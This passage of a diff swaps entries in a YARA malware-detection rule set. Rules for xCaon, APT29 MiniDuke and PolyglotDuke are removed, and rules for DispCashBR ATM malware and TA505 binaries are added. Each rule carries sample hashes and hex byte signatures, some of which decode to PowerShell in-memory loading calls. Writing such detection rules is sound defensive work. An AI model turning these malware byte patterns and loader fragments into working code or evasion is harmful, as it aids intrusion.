+		$s3 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 29 2e 47 65 74 54 79 70 65 28 29 2c 20 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c }
+		$s4 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 }
+		$s5 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c 29 }
+		$s6 = { 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 2e 47 65 74 41 73 73 65 6d 62 6c 69 65 73 28 29 20 7c 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 47 6c 6f 62 61 6c 41 73 73 65 6d 62 6c 79 43 61 63 68 65 20 2d 41 6e 64 20 24 5f 2e 4c 6f 63 61 74 69 6f 6e 2e 53 70 6c 69 74 28 27 5c 5c 27 29 5b 2d 31 5d 2e 45 71 75 61 6c 73 28 28 }
+		$s7 = { 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 53 74 61 6e 64 61 72 64 2c }
+		$s8 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 28 24 }
+		$s9 = { 3d 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 24 }
+		$s10 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 43 6f 70 79 28 24 }
+		$s11 = { 3d 5b 49 6e 74 50 74 72 5d 3a 3a 5a 65 72 6f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $s* )
+		filesize > 40KB and 8 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Xcaon_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_ATM_Dispcashbr_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect the xCaon malware"
+		description = "Detect the DispCashBR ATM malware"
 		author = "Arkbird_SOLG"
-		id = "bcd5a52d-9547-5709-95f4-9d1f956f623c"
-		date = "2021-07-01"
-		modified = "2021-07-02"
-		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_xCaon_Jul_2021_1.yara#L1-L21"
+		id = "629261d8-242c-580d-aa4d-4b313c77edef"
+		date = "2020-05-14"
+		modified = "2021-05-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-14/DispCashBR/ATM_DispCashBR_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "9c3e3d0035596323a505404ecc067bd2b87a4b0ac7499f1c87aac015f59eb65a"
+		logic_hash = "26f641a266c1f187d834a05b327c13ddee93747e182a5458e4ec3cb1f23f5f47"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
-		hash2 = "e9013f35ce11fc4c5eb2c21827bdc459202d362365d6ea5b724dee4fe0088bd1"
-		hash3 = "489fca69a622195328302e64e29b6183feac90826dce198432d603202ca4d216"
+		hash1 = "432f732a4ecbb86cb3dedbfa881f2733d20cbcc5958ead52823bf0967c133175"
+		hash2 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
 		tlp = "White"
-		adversary = "IndigoZebra"
+		adversary = "-"
 
 	strings:
-		$s1 = { a1 7c 10 41 00 33 c5 89 45 fc 8b 45 08 56 57 6a 49 89 85 f8 80 ff ff 58 6a 50 66 89 45 c8 58 6a 48 66 89 45 ca 58 6a 4c 66 89 45 cc 58 6a 50 66 89 45 ce 58 6a 41 66 89 45 d0 58 6a 50 66 89 45 d2 58 6a 49 66 89 45 d4 58 6a 2e 66 89 45 d6 58 6a 44 66 89 45 d8 58 66 89 45 da 6a 4c 58 66 89 45 dc 66 89 45 de 33 c0 66 89 45 e0 8d 45 c8 50 c7 45 e4 47 65 74 41 c7 45 e8 64 61 70 74 c7 45 ec 65 72 73 49 c7 45 f0 6e 66 6f 00 ff 15 50 d0 40 00 8d 4d e4 51 50 89 85 f4 80 ff ff ff 15 54 d0 40 00 8d 8d f0 80 ff ff 51 8d 8d fc 80 ff ff 51 c7 85 f0 80 ff ff 90 7e 00 00 ff d0 8b c8 33 c0 c6 45 f4 00 8d 7d f5 ab 66 ab aa 85 c9 0f 85 1d 01 00 00 53 6a 25 5e 6a 30 5a 6a 32 59 8b c6 66 89 45 8c 8b c2 66 89 45 8e 6a 58 8b c1 66 89 45 90 58 8b f8 6a 2d 66 89 7d 92 5f 8b df 66 89 5d 94 8b de 66 89 5d 96 8b da 66 89 5d 98 8b d9 66 89 5d 9a 8b d8 66 89 5d 9c 8b df 66 89 5d 9e 8b de 66 89 5d a0 8b da 66 89 5d a2 8b d9 66 89 5d a4 8b d8 66 89 5d a6 8b df 66 89 5d a8 8b de 66 89 5d aa 8b da 66 89 5d ac 8b d9 66 89 5d ae 8b d8 66 89 5d b0 8b df 66 89 5d b2 8b de 66 89 5d b4 8b da 66 89 5d b6 8b d9 66 89 45 c4 66 89 5d b8 8b d8 33 c0 66 89 45 c6 6a 06 8d 85 90 82 ff ff 50 8d 45 f4 50 66 89 5d ba 66 89 7d bc 66 89 75 be 66 89 55 c0 66 89 4d c2 e8 ?? 17 00 00 0f b6 45 f9 50 0f b6 45 f8 50 0f b6 45 f7 50 0f b6 45 f6 50 0f b6 45 f5 50 0f b6 45 f4 50 8d 45 8c 50 ff b5 f8 80 ff ff ff 15 44 d1 40 00 83 c4 2c 33 f6 46 5b ff b5 f4 80 ff ff ff 15 4c d0 40 00 8b }
-		$s2 = { 6a 5b 58 6a 55 66 89 45 c4 58 6a 70 66 89 45 c6 58 6a 6c 66 89 45 c8 58 6a 6f 66 89 45 ca 58 6a 61 66 89 45 cc 58 6a 64 66 89 45 ce 58 6a 5d 66 89 45 d0 58 6a 0d 66 89 45 d2 58 6a 0a 66 89 45 d4 58 6a 25 66 89 45 d6 33 c0 66 89 45 d8 58 6a 74 66 89 45 ac 8b c6 66 89 45 ae 58 6a 6d 66 89 45 b0 58 6a 70 66 89 45 b2 58 6a 25 66 89 45 b4 58 6a 64 66 89 45 b6 58 6a 2e 66 89 45 b8 58 6a 6c 66 89 45 ba 58 6a 6f 66 89 45 bc 58 6a 67 66 89 45 be 58 6a 46 66 89 45 c0 33 c0 66 89 45 c2 58 6a 69 66 89 45 dc 58 6a 6c 66 89 45 de 58 6a 65 66 89 45 e0 58 6a 3a 66 89 45 e2 58 66 89 45 e4 6a 25 58 66 89 45 e6 6a 0d 58 66 89 45 ea 6a 0a 58 66 89 45 ec 33 c0 66 89 45 ee 8d 45 c4 50 66 89 75 e8 e8 ?? 11 00 00 59 8d 4d c4 8d b5 50 f3 ff ff e8 [2] ff ff 89 bd 4c f2 ff ff c7 85 48 f3 ff ff 0f 00 00 00 89 bd 44 f3 ff ff c6 85 34 f3 ff ff 00 8d 85 34 f3 ff ff 50 83 ec 1c c6 45 fc 03 8d 85 fc f2 ff ff 8b f4 89 a5 50 f2 ff ff 50 e8 [2] ff ff e8 [2] ff ff 8b 9d 34 f3 ff ff 83 c4 20 83 bd 48 f3 ff ff 10 73 06 8d 9d 34 f3 ff ff 8d 85 4c f2 ff ff 50 }
-		$s3 = { 83 c4 10 8d 85 6c fb ff ff 50 68 04 01 00 00 ff 15 2c d0 40 00 33 c0 56 66 89 85 74 fd ff ff 8d 85 76 fd ff ff 53 50 e8 ?? 10 00 00 83 c4 0c ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 6c fb ff ff 50 8d 45 ac 50 8d 85 74 fd ff ff 50 ff d6 83 c4 10 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 74 fd ff ff 50 ff 15 24 d0 40 00 8b f8 83 ff ff 74 79 53 8d 85 50 f2 ff ff 50 ff b5 4c f2 ff ff 89 9d 50 f2 ff ff ff b5 48 f2 ff ff 57 ff 15 14 d0 40 00 57 ff 15 34 d0 40 00 33 c0 68 fe 07 00 00 66 89 85 6c f3 ff ff 8d 85 6e f3 ff ff 53 50 e8 ?? 10 00 00 8d 85 74 fd ff ff 50 8d 45 dc 50 8d 85 6c f3 ff ff 50 ff d6 8d 85 6c f3 ff ff 50 8d 85 18 f3 ff ff 50 8d 8d 50 f3 ff ff e8 [2] ff ff 83 }
-		$s4 = { 8b 45 08 33 ff 89 85 60 f1 ff ff 89 bd 5c f1 ff ff 33 c0 be 06 02 00 00 89 7d fc 56 66 89 85 88 fb ff ff 8d 85 8a fb ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 80 f9 ff ff 8d 85 82 f9 ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee bb 04 01 00 00 53 8d 85 88 fb ff ff 50 8d 45 e0 50 ff 15 00 d0 40 00 8d 85 80 f9 ff ff 50 53 ff 15 2c d0 40 00 6a 25 58 6a 73 5b 6a 63 66 89 45 c0 8b c3 66 89 45 c2 58 6a 63 66 89 45 c4 8b c3 66 89 45 c6 58 6a 6f 66 89 45 c8 58 6a 64 66 89 45 ca 58 6a 65 66 89 45 cc 58 66 89 45 ce 6a 25 58 6a 64 66 89 45 d0 58 6a 2e 66 89 45 d2 58 6a 6c 66 89 45 d4 58 6a 6f 66 89 45 d6 58 6a 67 66 89 45 d8 58 66 89 45 da 33 c0 68 fe 07 00 00 66 89 45 dc 66 89 85 80 f1 ff ff 8d 85 82 f1 ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 90 fd ff ff 8d 85 92 fd ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 25 58 6a 20 66 89 45 98 8b c3 66 89 45 9a 58 6a 2f 8b c8 66 89 4d 9c 59 6a 41 66 89 4d 9e 59 6a 2f 66 89 4d a0 8b c8 66 89 4d a2 59 6a 43 66 89 4d a4 59 66 89 4d a6 6a 22 8b c8 66 89 4d a8 59 6a 25 66 89 4d aa 59 66 89 4d ac 6a 22 8b cb 66 89 4d ae 59 66 89 4d b0 8b c8 6a 3e 66 89 4d b2 59 66 89 45 b6 6a 25 58 66 89 45 b8 33 c0 66 89 4d b4 66 89 5d ba 66 89 45 bc ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 80 f9 ff ff 50 8d 45 c0 50 8d 85 90 fd ff ff 50 ff d6 8b 45 0c 83 c4 10 83 7d 20 08 73 03 8d 45 0c 8d 8d 90 fd ff ff 51 50 8d 85 88 fb ff ff 50 8d 45 98 50 8d 85 80 f1 ff ff 50 ff d6 6a 44 5e 56 8d 85 04 f1 ff ff 57 50 e8 [2] 00 00 6a 10 8d 85 48 f1 ff ff 57 50 89 b5 04 f1 ff ff e8 [2] 00 00 83 c4 2c 8d 85 04 f1 ff ff 50 ff 15 28 d0 40 00 33 c0 66 89 85 34 f1 ff ff 8d 85 48 f1 ff ff 50 8d 85 04 f1 ff ff 50 57 57 6a 10 57 57 57 8d 85 80 f1 ff ff 33 db 50 43 57 89 9d 30 f1 ff ff ff 15 08 d0 40 00 68 3f 77 1b 00 ff b5 48 f1 ff ff 8b f0 ff 15 0c d0 40 00 3b f7 0f 84 1c 01 00 00 ff b5 4c f1 ff ff 8b 35 34 d0 40 00 ff d6 ff b5 48 f1 ff ff ff d6 33 c0 c7 85 78 f1 ff ff 07 00 00 00 89 bd 74 f1 ff ff 66 89 85 64 f1 ff ff 57 57 6a 03 57 57 68 00 00 00 80 8d 85 90 fd ff ff 50 88 5d fc ff 15 24 d0 40 00 89 85 5c f1 ff ff 83 f8 ff 0f 84 96 00 00 00 57 50 ff 15 04 d0 40 00 89 85 58 f1 ff ff 83 f8 ff 75 2b ff b5 5c f1 ff ff ff d6 8b 85 60 f1 ff ff 68 64 f1 40 00 e8 f1 00 00 00 53 33 ff 8d b5 64 f1 ff ff e8 64 03 00 00 e9 95 00 00 00 83 c0 02 50 e8 [2] 00 00 8b d8 8b 85 58 f1 ff ff 83 c0 02 50 57 53 e8 [2] 00 00 83 c4 10 57 8d 85 58 f1 ff ff 50 ff b5 58 f1 ff ff 53 ff b5 5c f1 ff ff ff 15 20 d0 40 00 ff b5 5c f1 ff ff ff d6 8d 85 64 f1 ff ff 50 53 e8 d9 11 00 00 53 e8 [2] 00 00 83 c4 0c 8d 85 90 fd ff ff 50 ff 15 38 d0 40 00 8b b5 60 f1 ff ff 8d 9d 64 f1 ff ff e8 96 00 00 00 6a 01 33 ff 8b }
-		$s5 = { be 06 02 00 00 89 ?? fc 56 66 89 85 ?? fb ff ff 8d 85 ?? fb ff ff ?? 50 e8 [2] 00 00 33 c0 56 66 89 85 ?? f9 ff ff 8d 85 ?? f9 ff ff ?? 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee ?? 04 01 00 00 ?? 8d 85 ?? fb ff ff 50 8d 45 e0 50 ff 15 00 [2] 00 8d 85 ?? f9 ff ff 50 ?? ff 15 [3] 00 }
-		$s6 = { 8b 45 08 [5] ff [5] 6a 07 89 85 10 ff ff ff ?? 33 ?? 33 c0 89 ?? 14 89 ?? 10 89 ?? 18 ff ff ff 66 89 ?? 8d ?? 1c 89 ?? fc 89 ?? 14 89 ?? 10 66 89 ?? 8d ?? 38 89 ?? 14 89 ?? 10 89 ?? 0c ff ff ff 66 89 ?? 89 ?? 6c 89 ?? 68 66 89 ?? 58 89 ?? 88 00 00 00 89 ?? 84 00 00 00 66 89 ?? 74 89 ?? b8 00 00 00 89 ?? b4 00 00 00 66 89 ?? a4 00 00 00 6a 68 }
+		$seq1 = { c7 45 cc 00 00 00 00 c7 04 24 68 5d 40 00 e8 40 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 89 44 24 04 c7 04 24 89 5d 40 00 e8 0c 0e 00 00 c7 04 24 a4 5d 40 00 e8 18 0e 00 00 8b 85 a0 fd ff ff 8b 40 0a 8b 40 03 01 45 cc c7 04 24 d0 07 00 00 e8 7d 0e 00 00 83 ec 04 8b 85 a0 fd ff ff 8d 48 0a 0f b7 85 be fd ff ff 0f b7 c0 8d 95 98 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 89 4c 24 08 c7 44 24 04 2e 01 00 00 89 04 24 e8 75 05 00 00 83 ec 14 89 45 e8 8b 45 e8 83 c0 38 83 }
+		$seq2 = { 0f b7 85 be fd ff ff 0f b7 c0 8b 55 e4 89 54 24 08 c7 44 24 04 06 00 00 00 89 04 24 e8 7e 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 b8 fd ff ff 89 54 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 5f 17 00 00 83 ec 0c 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 f8 16 00 00 83 ec 14 89 45 e0 8d 85 ac fd ff ff 89 44 24 08 c7 44 24 04 03 00 00 00 c7 04 24 04 00 00 00 e8 dc 16 00 00 83 ec 0c 8b 45 e0 83 c0 38 83 f8 }
+		$seq3 = { 8b 85 a8 fd ff ff 8b 50 14 8b 85 a8 fd ff ff 8b 40 10 0f af c2 89 45 d8 8b 45 d8 89 44 24 04 c7 04 24 04 5b 40 00 e8 aa 12 00 00 8b 85 a4 fd ff ff 0f b7 40 04 0f b7 c0 89 44 24 04 c7 04 24 24 5b 40 00 e8 8d 12 00 00 8b 85 a8 fd ff ff 8b 50 18 8b 85 a8 fd ff ff 8b 40 1c 0f af c2 89 45 d4 c7 45 f0 00 00 00 00 8b 45 d8 89 44 24 04 c7 04 24 45 5b 40 00 e8 5b 12 00 00 83 45 f0 01 83 7d f0 01 7e e3 8b 85 a0 fd ff ff c7 40 06 01 00 00 00 0f b7 85 be fd ff ff 0f b7 c0 8d 95 26 fd ff ff 89 54 24 10 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 04 2e 01 00 00 89 04 24 e8 60 ed ff ff 89 45 d0 }
+		$seq4 = { c7 45 ec 00 00 00 00 8d 85 c4 fd ff ff 89 44 24 04 c7 04 24 03 00 02 0b e8 47 1b 00 00 83 ec 08 89 45 e8 83 7d e8 00 74 18 c7 04 24 92 50 40 00 e8 8b 23 00 00 c7 04 24 ff ff ff ff e8 8f 23 00 00 c7 04 24 aa 50 40 00 e8 8b 23 00 00 c7 04 24 f5 ff ff ff e8 ef 23 00 00 83 ec 04 c7 44 24 04 03 00 00 00 89 04 24 e8 e4 23 00 00 83 ec 08 c7 04 24 b8 0b 00 00 e8 dd 23 00 00 83 ec 04 c7 04 24 c4 50 40 00 e8 4e 23 00 00 8d 85 c4 fd ff ff 83 c0 06 89 44 24 04 c7 04 24 ed 50 40 00 e8 1d 23 00 00 8d 85 c4 fd ff ff 05 07 01 00 00 89 44 24 04 c7 04 24 03 51 40 00 e8 02 23 00 00 0f b7 85 c8 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 1a 51 40 00 e8 e8 22 00 00 0f b7 85 c6 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 2f 51 40 00 e8 ce 22 00 00 0f b7 85 c4 fd ff ff 0f b7 c0 89 44 24 04 c7 04 24 42 51 40 00 e8 b4 22 00 00 c7 04 24 54 51 40 00 e8 c0 22 00 00 8d 85 c0 fd ff ff 89 04 24 e8 46 1a 00 00 83 ec 04 8b 85 c0 fd ff ff 8d 95 be fd ff ff 89 54 24 20 c7 44 24 1c 00 00 00 00 8d 95 c4 fd ff ff 89 54 24 18 c7 44 24 14 0f 00 02 0b c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 08 00 00 00 00 89 44 24 04 c7 04 24 7f 51 40 00 e8 f9 19 00 00 83 ec 24 89 45 e8 8b 45 e8 83 c0 36 83 f8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_APT_APT29_Miniduke_Mar_2021_1 : FILE
+
+rule ARKBIRD_SOLG_TA505_Bin_21Nov_1 : FILE
 {
 	meta:
-		description = "Detect MiniDuke implant used by APT29 group"
+		description = "module1.bin"
 		author = "Arkbird_SOLG"
-		id = "2faefc2f-afe3-51df-b530-50d3b3775071"
-		date = "2021-03-08"
-		modified = "2021-03-10"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_MiniDuke_Mar_2021_1.yar#L1-L20"
+		id = "2f23653e-5158-5a64-86ee-a58048780661"
+		date = "2019-11-21"
+		modified = "2019-11-21"
+		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L3-L30"
 		license_url = "N/A"
-		logic_hash = "2fcbe37f9ee26a246bfc397cc907bb570a01d0f5b8e323a81aae0f6426b60435"
-		score = 50
+		logic_hash = "133f202300a9e0428d20ce76bc832cf45cb5dacb05e39c21130d8d5cc39446ba"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "6057b19975818ff4487ee62d5341834c53ab80a507949a52422ab37c7c46b7a1"
-		level = "Experimental"
+		hash1 = "bfe610790d41091c37ae627472f5f8886357e713945ca8a5e2b56cd6c791f989"
 
 	strings:
-		$s1 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 00 00 00 00 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 25 73 }
-		$s2 = { 70 72 6f 63 3a 20 20 25 64 20 25 73 0a 6c 6f 67 69 6e 3a 20 25 73 5c 25 73 0a 49 44 3a 20 20 20 20 30 78 25 30 38 58 0a 68 6f 73 74 3a 20 20 25 73 3a 25 64 0a 6d 65 74 68 3a 20 20 25 73 20 25 64 0a 70 69 70 65 3a 20 5c 5c 25 73 5c 70 69 70 65 5c 25 73 0a 6c 61 6e 67 3a 20 20 25 73 0a 64 65 6c 61 79 3a 20 25 64 }
-		$s3 = { 75 70 74 69 6d 65 20 25 35 64 2e 25 30 32 64 68 0a 00 25 73 3a 25 64 00 25 73 5c 25 73 00 3f 00 25 64 20 25 73 0a 25 73 20 25 73 20 25 73 }
-		$s4 = { 55 89 e5 83 ec 14 6a 02 ff 15 b8 53 44 00 e8 fd fe ff ff 8d b6 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 14 6a 01 ff 15 }
-		$s5 = { 8b 85 54 64 ff ff 8b 95 44 64 ff ff 83 c2 44 89 44 24 04 89 14 24 e8 a4 e5 fc ff 83 ec 08 8b 85 44 64 ff ff 83 c0 38 c7 44 24 08 0c 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 e8 8c e8 fd ff 8b 85 44 64 ff ff c7 40 38 0c 00 00 00 8b 85 44 64 ff ff c7 40 40 01 00 00 00 8b 85 44 64 ff ff c7 40 3c 00 00 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 1c 8b 85 44 64 ff ff 83 c0 18 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 2e e5 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 0f 84 09 05 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 24 8b 85 44 64 ff ff 83 c0 20 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 eb e4 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 }
+		$s1 = "intc.dll" fullword ascii
+		$s2 = "?%?2?7?=?" fullword ascii
+		$s3 = "Is c++ not java" fullword ascii
+		$s4 = "4%5K5e5l5p5t5x5|5" fullword ascii
+		$s5 = "KdaMt$" fullword ascii
+		$s6 = ";*;9;Z;`;" fullword ascii
+		$s7 = "<*<4<?<I<S<Y<" fullword ascii
+		$s8 = "0'040A0K0U0]0k0" fullword ascii
+		$s9 = "3 3(30363>3M3_3" fullword ascii
+		$s10 = ": :9:A:F:R:W:t:z:" fullword ascii
+		$s11 = "5'5,585@5H5P5f5n5v5~5" fullword ascii
+		$s12 = "<,<2<:<@<h<n<" fullword ascii
+		$s13 = "8+808:8T8b8j8p8" fullword ascii
+		$s14 = "8!9<9K9g9o9z9" fullword ascii
+		$s15 = ">(>6>D>N>U>f>p>" fullword ascii
+		$s16 = ":!:,:>:J:X:^:c:i:v:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 150KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "642f4619fb2d93cb205c65c2546516ca" and pe.exports ( "intc" ) or 8 of them )
 }
-rule ARKBIRD_SOLG_APT_APT29_Polyglotduke_Mar_2021_1 : FILE
+
+rule ARKBIRD_SOLG_TA505_Bin_21Nov_2 : FILE
 {
 	meta:
-		description = "Detect PolyglotDuke implant used by APT29 group"
+		description = "vspub1.bin"
 		author = "Arkbird_SOLG"
-		id = "751e4f57-2c31-5cad-a794-e124b40c537b"
-		date = "2021-03-08"
-		modified = "2021-03-10"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_PolyglotDuke_Mar_2021_1.yar#L1-L19"
+		id = "2bbd1d3a-50ab-5c6a-97fe-60b5a86e8d18"
+		date = "2019-11-21"
+		modified = "2019-11-21"
+		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L32-L50"
 		license_url = "N/A"
-		logic_hash = "3a6d54fb266fe054886569c200f122b1e4459e0d561fe5246b623a19ec526224"
+		logic_hash = "43fb83abdeb1a31da836b4cf99dcda269f6d005cbb8eb2d845498d2c589574e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "9b33ec7f5e615a6556f147b611425d3ca4a8879ce746d4a8cb62adf4c7f76029"
-		hash2 = "0c39fce5bd32b4f91a1df4f6321c2f01c017195659c7e95a235ef71ca2865aa9"
+		hash1 = "54cc27076793d5de064813c61d52452d42f774d24b3859a63002d842914fd9cd"
 
 	strings:
-		$seq1 = { 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 4c 8b 15 [2] 02 00 41 8b c0 4c 33 15 [2] 02 00 74 03 49 ff e2 83 e0 01 4c 8b ca 41 83 e0 02 8b d0 48 ff 25 [2] 01 00 cc cc cc 4c 8b 15 [2] 02 00 4c 33 15 [2] 02 00 74 03 49 ff e2 48 ff 25 [2] 01 00 cc cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 07 48 83 c4 28 48 ff e0 b9 78 00 00 00 ff 15 [2] 01 00 32 c0 48 83 c4 28 c3 cc cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 33 c0 c3 cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 }
-		$seq2 = { 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 30 33 ff 48 8b da 48 8b f1 48 85 c9 75 18 e8 69 0c 00 00 bb 16 00 00 00 89 18 e8 b1 38 00 00 8b c3 e9 a7 00 00 00 48 85 d2 74 e3 e8 a8 3f 00 00 41 bf 01 00 00 00 85 c0 75 0c ff 15 [2] 01 00 85 c0 41 0f 44 ff 83 64 24 28 00 48 83 23 00 48 83 64 24 20 00 41 83 c9 ff 4c 8b c6 33 d2 8b cf ff 15 [2] 01 00 48 63 e8 85 c0 75 11 ff 15 [2] 01 00 8b c8 e8 b2 0b 00 00 33 c0 eb 4f 48 8b cd 48 03 c9 e8 e3 07 00 00 48 89 03 48 85 c0 74 e9 41 83 c9 ff 4c 8b c6 33 d2 8b cf 89 6c 24 28 48 89 44 24 20 ff 15 [2] 01 00 85 c0 75 1b ff 15 [2] 01 00 8b c8 e8 70 0b 00 00 48 8b 0b e8 ?? f3 ff ff 48 83 23 00 eb b0 41 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 